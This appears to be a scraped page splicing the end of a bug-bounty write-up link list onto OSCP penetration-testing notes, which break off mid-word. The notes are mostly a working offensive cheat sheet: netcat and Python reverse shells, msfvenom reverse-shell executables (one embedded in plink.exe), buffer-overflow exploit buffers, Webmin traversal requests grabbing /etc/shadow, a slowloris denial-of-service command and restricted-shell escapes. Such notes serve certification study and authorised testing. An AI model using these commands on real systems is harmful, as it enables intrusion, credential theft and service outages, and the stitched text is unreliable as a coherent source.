mishre - [Slack SAML authentication bypass](http://blog.intothesymmetry.com/2017/10/slack-saml-authentication-bypass.html) by Antonio Sanso - [Shopify admin authentication bypass using partners.shopify.com](https://hackerone.com/reports/270981) by uzsunny ### HTTP Header Injection - [Twitter Overflow Trilogy in Twitter](https://blog.innerht.ml/overflow-trilogy/) by filedescriptor - [Twitter CRLF](https://blog.innerht.ml/twitter-crlf-injection/) by filedescriptor - [Adblock Plus and (a little) more in Google](https://adblockplus.org/blog/finding-security-issues-in-a-website-or-how-to-get-paid-by-google) - [$10k host header](https://sites.google.com/site/testsitehacking/10k-host-header) by Ezequiel Pereira ### Subdomain Takeover - [Hijacking tons of Instapage expired users Domains & Subdomains](http://www.geekboy.ninja/blog/hijacking-tons-of-instapage-expired-users-domains-subdomains/) by geekboy - [Reading Emails in Uber Subdomains](https://hackerone.com/reports/156536) - [Slack Bug Journey](http://secalert.net/slack-security-bug-bounty.html) - by David Vieira-Kurz - [Subdomain takeover and chain it to perform authentication bypass](https://www.arneswinnen.net/2017/06/authentication-bypass-on-ubers-sso-via-subdomain-takeover/) by Arne Swinnen - [Hacker.One Subdomain Takeover](https://hackerone.com/reports/159156) - by geekboy ### Author Write Up - [Payment Flaw in Yahoo](http://ngailong.com/abusing-multistage-logic-flaw-to-buy-anything-for-free-at-hk-deals-yahoo-com/) - [Bypassing Google Email Domain Check to Deliver Spam Email on Google’s Behalf](http://ngailong.com/bypassing-google-email-domain-check-to-deliver-spam-email-on-googles-behalf/) - [When Server Side Request Forgery combine with Cross Site Scripting](http://ngailong.com/what-could-happen-when-server-side-request-forgery-combine-with-cross-site-scripting/) ## XSSI - [Plain Text Reading by XSSI](http://balpha.de/2013/02/plain-text-considered-harmful-a-cross-domain-exploit/) - [JSON hijacking](http://blog.portswigger.net/2016/11/json-hijacking-for-modern-web.html) - [OWASP XSSI](https://www.owasp.org/images/f/f3/Your_Script_in_My_Page_What_Could_Possibly_Go_Wrong_-_Sebastian_Lekies%2BBen_Stock.pdf) - [Japan Identifier based XSSI attacks](http://www.mbsd.jp/Whitepaper/xssi.pdf) - [JSON Hijack Slide](https://www.owasp.org/images/6/6a/OWASPLondon20161124_JSON_Hijacking_Gareth_Heyes.pdf) ## Email Related - [This domain is my domain - G Suite A record vulnerability](http://blog.pentestnepal.tech/post/156959105292/this-domain-is-my-domain-g-suite-a-record) - [I got emails - G Suite Vulnerability](http://blog.pentestnepal.tech/post/156707088037/i-got-emails-g-suite-vulnerability) - [How I snooped into your private Slack messages [Slack Bug bounty worth $2,500]](http://blog.pentestnepal.tech/post/150381068912/how-i-snooped-into-your-private-slack-messages) - [Reading Uber’s Internal Emails [Uber Bug Bounty report worth $10,000]](http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty) - [Slack Yammer Takeover by using TicketTrick](https://medium.com/@intideceukelaire/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c) by Inti De Ceukelaire - [How I could have mass uploaded from every Flickr account!](https://ret2got.wordpress.com/2017/10/05/how-i-could-have-mass-uploaded-from-every-flickr-account/) ## Money Stealing - [Round error issue -> produce money for free in Bitcoin Site](https://hackerone.com/reports/176461) by 4lemon ## 2017 Local File Inclusion - [Disclosure Local File Inclusion by Symlink](https://hackerone.com/reports/213558) - [Facebook Symlink Local File Inclusion](http://josipfranjkovic.blogspot.hk/2014/12/reading-local-files-from-facebooks.html) - [Gitlab Symlink Local File Inclusion](https://hackerone.com/reports/158330) - [Gitlab Symlink Local File Inclusion Part II](https://hackerone.com/reports/178152) - [Multiple Company LFI](http://panchocosil.blogspot.sg/2017/05/one-cloud-based-local-file-inclusion.html) - [LFI by video conversion, excited about this trick!](https://hackerone.com/reports/226756) ## Miscellaneous - [SAML Pen Test Good Paper](http://research.aurainfosec.io/bypassing-saml20-SSO/) - [A list of FB writeup collected by phwd](https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640) by phwd - [NoSQL Injection](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecurify - [CORS in action](http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) - [CORS in Fb messenger](http://www.cynet.com/blog-facebook-originull/) - [Web App Methodologies](https://blog.zsec.uk/ltr101-method-to-madness/) - [XXE Cheatsheet](https://www.silentrobots.com/blog/2015/12/14/xe-cheatsheet-update/) - [The road to hell is paved with SAML Assertions, Microsoft Vulnerability](http://www.economyofmechanism.com/office365-authbypass.html#office365-authbypass) - [Study this if you like to learn Mongo SQL Injection](https://cirw.in/blog/hash-injection) by cirw - [Mongo DB Injection again](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecrify - [w3af speech about modern vulnerability](https://www.youtube.com/watch?v=GNU0_Uzyvl0) by w3af - [Web cache attack that lead to account takeover](http://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html) - [A talk to teach you how to use SAML Raider](https://www.usenix.org/conference/usenixsecurity12/technical-sessions/presentation/somorovsky) - [XSS Checklist when you have no idea how to exploit the bug](http://d3adend.org/xss/ghettoBypass) - [CTF write up, Great for Bug Bounty](https://ctftime.org/writeups?tags=web200&hidden-tags=web%2cweb100%2cweb200) - [It turns out every site uses jquery mobile with Open Redirect is vulnerable to XSS](http://sirdarckcat.blogspot.com/2017/02/unpatched-0day-jquery-mobile-xss.html) by sirdarckcat - [Bypass CSP by using google-analytics](https://hackerone.com/reports/199779) - [Payment Issue with Paypal](https://hackerone.com/reports/219215) - [Browser Exploitation in Chinese](http://paper.seebug.org/) - [XSS bypass filter](https://t.co/0Kpzo52ycb) - [Markup Impropose Sanitization](https://github.com/ChALkeR/notes/blob/master/Improper-markup-sanitization.md) - [Breaking XSS mitigations via Script Gadget](https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf) - [X41 Browser Security White Paper](https://browser-security.x41-dsec.de/X41-Browser-Security-White-Paper.pdf) - [Bug Bounty Cheatsheets](https://github.com/EdOverflow/bugbounty-cheatsheet) By EdOverflow - [Messing with the Google Buganizer System for $15,600 in Bounties](https://medium.freecodecamp.org/messing-with-the-google-buganizer-system-for-15-600-in-bounties-58f86cc9f9a5) - [Electron Security White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf) - [Twitter's Vine Source code dump - $10080](https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/) - [SAML Bible](https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/) - [Bypassing Google’s authentication to access their Internal Admin panels — Vishnu Prasad P G](https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-admin-panels-12acd3d821e3)
# OSCP-Notes Kali Linux ======================================================================================================== - Set the Target IP Address to the `$ip` system variable `export ip=192.168.1.100` - Find the location of a file `locate sbd.exe` - Search through directories in the `$PATH` environment variable `which sbd` - Find a search for a file that contains a specific string in it’s name: `find / -name sbd\*` - Show active internet connections `netstat -lntp` - Change Password `passwd` - Verify a service is running and listening `netstat -antp |grep apache` - Start a service `systemctl start ssh ` `systemctl start apache2` - Have a service start at boot `systemctl enable ssh` - Stop a service `systemctl stop ssh` - Unzip a gz file `gunzip access.log.gz` - Unzip a tar.gz file `tar -xzvf file.tar.gz` - Search command history `history | grep phrase_to_search_for` - Download a webpage `wget http://www.cisco.com` - Open a webpage `curl http://www.cisco.com` - String manipulation - Count number of lines in file `wc -l index.html` - Get the start or end of a file `head index.html` `tail index.html` - Extract all the lines that contain a string `grep "href=" index.html` - Cut a string by a delimiter, filter results then sort `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u` - Using Grep and regular expressions and output to a file `cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt` - Use a bash loop to find the IP address behind each host `for url in $(cat list.txt); do host $url; done` - Collect all the IP Addresses from a log file and sort by frequency `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn` - Decoding using Kali - Decode Base64 Encoded Values `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode` - Decode Hexidecimal Encoded Values `echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps` - Netcat - Read and write TCP and UDP Packets - Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems): [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/) - Connect to a POP3 mail server `nc -nv $ip 110` - Listen on TCP/UDP port `nc -nlvp 4444` - Connect to a netcat port `nc -nv $ip 4444` - Send a file using netcat `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe` - Receive a file using netcat `nc -nlvp 4444 > incoming.exe` - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that... whereis nc nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz /bin/nc.traditional -e /bin/bash 1.2.3.4 4444 - Create a reverse shell with Ncat using cmd.exe on Windows `nc.exe -nlvp 4444 -e cmd.exe` or `nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe` - Create a reverse shell with Ncat using bash on Linux `nc -nv $ip 4444 -e /bin/bash` - Netcat for Banner Grabbing: `echo "" | nc -nv -w1 <IP Address> <Ports>` - Ncat - Netcat for Nmap project which provides more security avoid IDS - Reverse shell from windows using cmd.exe using ssl `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl` - Listen on port 4444 using ssl `ncat -v $ip 4444 --ssl` - Wireshark - Show only SMTP (port 25) and ICMP traffic: `tcp.port eq 25 or icmp` - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet: `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16` - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs: `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip` - Some commands are equal `ip.addr == xxx.xxx.xxx.xxx` Equals `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx ` ` ip.addr != xxx.xxx.xxx.xxx` Equals `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx` - Tcpdump - Display a pcap file `tcpdump -r passwordz.pcap` - Display ips and filter and sort `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head` - Grab a packet capture on port 80 `tcpdump tcp port 80 -w output.pcap -i eth0` - Check for ACK or PSH flag set in a TCP packet `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap` - IPTables - Deny traffic to ports except for Local Loopback `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP ` `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP` - Clear ALL IPTables firewall rules ```bash iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT iptables -t nat -F iptables -t mangle -F iptables -F iptables -X iptables -t raw -F iptables -t raw -X ``` Information Gathering & Vulnerability Scanning =================================================================================================================================== - Passive Information Gathering --------------------------------------------------------------------------------------------------------------------------- - Google Hacking - Google search to find website sub domains `site:microsoft.com` - Google filetype, and intitle `intitle:"netbotz appliance" "OK" -filetype:pdf` - Google inurl `inurl:"level/15/sexec/-/show"` - Google Hacking Database: https://www.exploit-db.com/google-hacking-database/ - SSL Certificate Testing [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html) - Email Harvesting - Simply Email `git clone https://github.com/killswitch-GUI/SimplyEmail.git ` `./SimplyEmail.py -all -e TARGET-DOMAIN` - Netcraft - Determine the operating system and tools used to build a site https://searchdns.netcraft.com/ - Whois Enumeration `whois domain-name-here.com ` `whois $ip` - Banner Grabbing - `nc -v $ip 25` - `telnet $ip 25` - `nc TARGET-IP 80` - Recon-ng - full-featured web reconnaissance framework written in Python - `cd /opt; git clone https://[email protected]/LaNMaSteR53/recon-ng.git ` `cd /opt/recon-ng ` `./recon-ng ` `show modules ` `help` - Active Information Gathering -------------------------------------------------------------------------------------------------------------------------- <!-- --> - Port Scanning ----------------------------------------------------------------------------------------------------------- *Subnet Reference Table* / | Addresses | Hosts | Netmask | Amount of a Class C --- | --- | --- | --- | --- /30 | 4 | 2 | 255.255.255.252| 1/64 /29 | 8 | 6 | 255.255.255.248 | 1/32 /28 | 16 | 14 | 255.255.255.240 | 1/16 /27 | 32 | 30 | 255.255.255.224 | 1/8 /26 | 64 | 62 | 255.255.255.192 | 1/4 /25 | 128 | 126 | 255.255.255.128 | 1/2 /24 | 256 | 254 | 255.255.255.0 | 1 /23 | 512 | 510 | 255.255.254.0 | 2 /22 | 1024 | 1022 | 255.255.252.0 | 4 /21 | 2048 | 2046 | 255.255.248.0 | 8 /20 | 4096 | 4094 | 255.255.240.0 | 16 /19 | 8192 | 8190 | 255.255.224.0 | 32 /18 | 16384 | 16382 | 255.255.192.0 | 64 /17 | 32768 | 32766 | 255.255.128.0 | 128 /16 | 65536 | 65534 | 255.255.0.0 | 256 - Set the ip address as a variable `export ip=192.168.1.100 ` `nmap -A -T4 -p- $ip` - Netcat port Scanning `nc -nvv -w 1 -z $ip 3388-3390` - Discover active IPs usign ARP on the network: `arp-scan $ip/24` - Discover who else is on the network `netdiscover` - Discover IP Mac and Mac vendors from ARP `netdiscover -r $ip/24` - Nmap stealth scan using SYN `nmap -sS $ip` - Nmap stealth scan using FIN `nmap -sF $ip` - Nmap Banner Grabbing `nmap -sV -sT $ip` - Nmap OS Fingerprinting `nmap -O $ip` - Nmap Regular Scan: `nmap $ip/24` - Enumeration Scan `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt` - Enumeration Scan All Ports TCP / UDP and output to a txt file `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip` - Nmap output to a file: `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24` - Quick Scan: `nmap -T4 -F $ip/24` - Quick Scan Plus: `nmap -sV -T4 -O -F --version-light $ip/24` - Quick traceroute `nmap -sn --traceroute $ip` - All TCP and UDP Ports `nmap -v -sU -sS -p- -A -T4 $ip` - Intense Scan: `nmap -T4 -A -v $ip` - Intense Scan Plus UDP `nmap -sS -sU -T4 -A -v $ip/24` - Intense Scan ALL TCP Ports `nmap -p 1-65535 -T4 -A -v $ip/24` - Intense Scan - No Ping `nmap -T4 -A -v -Pn $ip/24` - Ping scan `nmap -sn $ip/24` - Slow Comprehensive Scan `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24` - Scan with Active connect in order to weed out any spoofed ports designed to troll you `nmap -p1-65535 -A -T5 -sT $ip` - Enumeration ----------- - DNS Enumeration - NMAP DNS Hostnames Lookup `nmap -F --dns-server <dns server ip> <target ip range>` - Host Lookup `host -t ns megacorpone.com` - Reverse Lookup Brute Force - find domains in the same range `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"` - Perform DNS IP Lookup `dig a domain-name-here.com @nameserver` - Perform MX Record Lookup `dig mx domain-name-here.com @nameserver` - Perform Zone Transfer with DIG `dig axfr domain-name-here.com @nameserver` - DNS Zone Transfers Windows DNS zone transfer `nslookup -> set type=any -> ls -d blah.com ` Linux DNS zone transfer `dig axfr blah.com @ns1.blah.com` - Dnsrecon DNS Brute Force `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml` - Dnsrecon DNS List of megacorp `dnsrecon -d megacorpone.com -t axfr` - DNSEnum `dnsenum zonetransfer.me` - NMap Enumeration Script List: - NMap Discovery [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html) - Nmap port version detection MAXIMUM power `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>` - NFS (Network File System) Enumeration - Show Mountable NFS Shares `nmap -sV --script=nfs-showmount $ip` - RPC (Remote Procedure Call) Enumeration - Connect to an RPC share without a username and password and enumerate privledges `rpcclient --user="" --command=enumprivs -N $ip` - Connect to an RPC share with a username and enumerate privledges `rpcclient --user="<Username>" --command=enumprivs $ip` - SMB Enumeration - SMB OS Discovery `nmap $ip --script smb-os-discovery.nse` - Nmap port scan `nmap -v -p 139,445 -oG smb.txt $ip-254` - Netbios Information Scanning `nbtscan -r $ip/24` - Nmap find exposed Netbios servers `nmap -sU --script nbstat.nse -p 137 $ip` - Nmap all SMB scripts scan `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip` - Nmap all SMB scripts authenticated scan `nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip` - SMB Enumeration Tools `nmblookup -A $ip ` `smbclient //MOUNT/share -I $ip -N ` `rpcclient -U "" $ip ` `enum4linux $ip ` `enum4linux -a $ip` - SMB Finger Printing `smbclient -L //$ip` - Nmap Scan for Open SMB Shares `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24` - Nmap scans for vulnerable SMB Servers `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip` - Nmap List all SMB scripts installed `ls -l /usr/share/nmap/scripts/smb*` - Enumerate SMB Users `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14` OR `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip` - RID Cycling - Null Sessions `ridenum.py $ip 500 50000 dict.txt` - Manual Null Session Testing Windows: `net use \\$ip\IPC$ "" /u:""` Linux: `smbclient -L //$ip` - SMTP Enumeration - Mail Severs - Verify SMTP port using Netcat `nc -nv $ip 25` - POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet root@kali:~# telnet $ip 110 +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready USER billydean +OK PASS password +OK Welcome billydean list +OK 2 1807 1 786 2 1021 retr 1 +OK Message follows From: [email protected] Dear Billy Dean, Here is your login for remote desktop ... try not to forget it this time! username: billydean password: PA$$W0RD!Z - SNMP Enumeration -Simple Network Management Protocol - Fix SNMP output values so they are human readable `apt-get install snmp-mibs-downloader download-mibs ` `echo "" > /etc/snmp/snmp.conf` - SNMP Enumeration Commands - `snmpcheck -t $ip -c public` - `snmpwalk -c public -v1 $ip 1|` - `grep hrSWRunName|cut -d\* \* -f` - `snmpenum -t $ip` - `onesixtyone -c names -i hosts` - SNMPv3 Enumeration `nmap -sV -p 161 --script=snmp-info $ip/24` - Automate the username enumeration process for SNMPv3: `apt-get install snmp snmp-mibs-downloader ` `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb` - SNMP Default Credentials /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt - MS SQL Server Enumeration - Nmap Information Gathering `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip` - Webmin and miniserv/0.01 Enumeration - Port 10000 Test for LFI & file disclosure vulnerability by grabbing /etc/passwd `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd` Test to see if webmin is running as root by grabbing /etc/shadow `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow` - Linux OS Enumeration - List all SUID files `find / -perm -4000 2>/dev/null` - Determine the current version of Linux `cat /etc/issue` - Determine more information about the environment `uname -a` - List processes running `ps -xaf` - List the allowed (and forbidden) commands for the invoking use `sudo -l` - List iptables rules `iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security` - Windows OS Enumeration - net config Workstation - systeminfo | findstr /B /C:"OS Name" /C:"OS Version" - hostname - net users - ipconfig /all - route print - arp -A - netstat -ano - netsh firewall show state - netsh firewall show config - schtasks /query /fo LIST /v - tasklist /SVC - net start - DRIVERQUERY - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated - dir /s *pass* == *cred* == *vnc* == *.config* - findstr /si password *.xml *.ini *.txt - reg query HKLM /f password /t REG_SZ /s - reg query HKCU /f password /t REG_SZ /s - Vulnerability Scanning with Nmap - Nmap Exploit Scripts [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html) - Nmap search through vulnerability scripts `cd /usr/share/nmap/scripts/ ls -l \*vuln\*` - Nmap search through Nmap Scripts for a specific keyword `ls /usr/share/nmap/scripts/\* | grep ftp` - Scan for vulnerable exploits with nmap `nmap --script exploit -Pn $ip` - NMap Auth Scripts [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html) - Nmap Vuln Scanning [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html) - NMap DOS Scanning `nmap --script dos -Pn $ip NMap Execute DOS Attack nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true` - Scan for coldfusion web vulnerabilities `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip` - Anonymous FTP dump with Nmap `nmap -v -p 21 --script=ftp-anon.nse $ip-254` - SMB Security mode scan with Nmap `nmap -v -p 21 --script=ftp-anon.nse $ip-254` - File Enumeration - Find UID 0 files root execution - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null` - Get handy linux file system enumeration script (/var/tmp) `wget https://highon.coffee/downloads/linux-local-enum.sh ` `chmod +x ./linux-local-enum.sh ` `./linux-local-enum.sh` - Find executable files updated in August `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug` - Find a specific file on linux `find /. -name suid\*` - Find all the strings in a file `strings <filename>` - Determine the type of a file `file <filename>` - HTTP Enumeration ---------------- - Search for folders with gobuster: `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip` - OWasp DirBuster - Http folder enumeration - can take a dictionary file - Dirb - Directory brute force finding using a dictionary file `dirb http://$ip/ wordlist.dict ` `dirb <http://vm/> ` Dirb against a proxy - `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129` - Nikto `nikto -h $ip` - HTTP Enumeration with NMAP `nmap --script=http-enum -p80 -n $ip/24` - Nmap Check the server methods `nmap --script http-methods --script-args http-methods.url-path='/test' $ip` - Get Options available from web server `curl -vX OPTIONS vm/test` - Uniscan directory finder: `uniscan -qweds -u <http://vm/>` - Wfuzz - The web brute forcer `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test ` `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ ` `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"` `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ` Recurse level 3 `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ` <!-- --> - Open a service using a port knock (Secured with Knockd) for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201 --max-retries 0 -p $x server\_ip\_address; done - WordPress Scan - Wordpress security scanner - wpscan --url $ip/blog --proxy $ip:3129 - RSH Enumeration - Unencrypted file transfer system - auxiliary/scanner/rservices/rsh\_login - Finger Enumeration - finger @$ip - finger batman@$ip - TLS & SSL Testing - ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html - Proxy Enumeration (useful for open proxies) - nikto -useproxy http://$ip:3128 -h $ip - Steganography > apt-get install steghide > > steghide extract -sf picture.jpg > > steghide info picture.jpg > > apt-get install stegosuite - The OpenVAS Vulnerability Scanner - apt-get update apt-get install openvas openvas-setup - netstat -tulpn - Login at: https://$ip:9392 Buffer Overflows and Exploits =================================================================================================================================== - DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) - Nmap Fuzzers: - NMap Fuzzer List [https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html) - NMap HTTP Form Fuzzer nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip - Nmap DNS Fuzzer nmap --script dns-fuzz --script-args timelimit=2h $ip -d - MSFvenom [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/) - Windows Buffer Overflows - Controlling EIP locate pattern_create pattern_create.rb -l 2700 locate pattern_offset pattern_offset.rb -q 39694438 - Verify exact location of EIP - [\*] Exact match at offset 2606 buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90 - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF - Use Mona to determine a module that is unprotected - Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP - Use NASM to determine the HEX code for a JMP ESP instruction /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb JMP ESP 00000000 FFE4 jmp esp - Run Mona in immunity log window to find (FFE4) XEF command !mona find -s "\xff\xe4" -m slmfc.dll found at 0x5f4a358f - Flip around for little endian format buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390 - MSFVenom to create payload msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d" - Final Payload with NOP slide buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode - Create a PE Reverse Shell msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f exe -o shell\_reverse.exe - Create a PE Reverse Shell and Encode 9 times with Shikata\_ga\_nai msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata\_ga\_nai -i 9 -o shell\_reverse\_msf\_encoded.exe - Create a PE reverse shell and embed it into an existing executable msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata\_ga\_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell\_reverse\_msf\_encoded\_embedded.exe - Create a PE Reverse HTTPS shell msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip LPORT=443 -f exe -o met\_https\_reverse.exe - Linux Buffer Overflows - Run Evans Debugger against an app edb --run /usr/games/crossfire/bin/crossfire - ESP register points toward the end of our CBuffer add eax,12 jmp eax 83C00C add eax,byte +0xc FFE0 jmp eax - Check for “Bad Characters” Process of elimination - Run multiple times 0x00 - 0xFF - Find JMP ESP address "\\x97\\x45\\x13\\x08" \# Found at Address 08134597 - crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" + "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90" - msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai - Connect to the shell with netcat: nc -v $ip 4444 Shells =================================================================================================================================== - Netcat Shell Listener `nc -nlvp 4444` - Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user. (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell ) (hint: sudo -l to see what you can run) - You may encounter limited shells that use rbash and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost: ssh user@$ip nc $localip 4444 -e /bin/sh enter user's password python -c 'import pty; pty.spawn("/bin/sh")' export TERM=linux `python -c 'import pty; pty.spawn("/bin/sh")'` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);' `echo os.system('/bin/bash')` `/bin/sh -i` `perl —e 'exec "/bin/sh";'` perl: `exec "/bin/sh";` ruby: `exec "/bin/sh"` lua: `os.execute('/bin/sh')` From within IRB: `exec "/bin/sh"` From within vi: `:!bash` or `:set shell=/bin/bash:shell` From within vim `':!bash':` From within nmap: `!sh` From within tcpdump echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root From busybox `/bin/busybox telnetd -|/bin/sh -p9999` - Pen test monkey PHP reverse shell [http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) - php-findsock-shell - turns PHP port 80 into an interactive shell [http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell) - Perl 